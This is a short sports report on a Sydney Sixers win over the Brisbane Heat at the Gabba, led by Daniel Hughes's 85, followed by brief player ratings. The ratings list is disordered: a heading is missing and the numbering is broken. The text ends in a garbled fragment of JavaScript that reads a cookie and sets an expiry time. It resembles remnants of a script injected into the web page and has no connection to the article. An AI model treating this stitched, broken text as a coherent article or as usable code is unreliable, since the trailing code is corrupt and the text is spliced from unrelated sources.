Sydney Sixes batsman Daniel Hughes has guided his side to a three-wicket win over the Brisbane Heat at the Gabba, with an impressive 85 runs from 55 balls.

The Heat posted 6-186, before the Sixes chased down the total with just two balls to spare.

Brisbane had several handy contributions, with Brendon McCullum (30) and Jimmy Peirson (44) hitting out at the top of the innings, while Joe Burns hit an unbeaten 51 in the middle order.

Hughes then almost batted out the entire innings, before being bowled with the first ball of the final over, with four runs still required. Despite looking in control for most of the chase, the Sixes just managed to get over the line, with a wicket and two dot balls leaving four runs to get with three balls remaining.

Sean Abbott then top edged a ball over the keeper's head for four to hand the Sixes victory. Nic Maddinson (24) and Brad Haddin (32) also made valuable contributions.

Batted for almost the whole innings and won the game for the Sixes, hitting seven fours and four sixes in a controlled, yet blistering knock.

2. Jimmy Peirson (Heat)

Got the hosts off to a brilliant start with a quick fire 44 at the top of the order.

  1. Brad Haddin (Sixes)

Arguably changed the game with 32 from 13 balls with three fours and two sixes. Invaluable knock following the loss of a few quick wickets and got the Sizes back on top. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
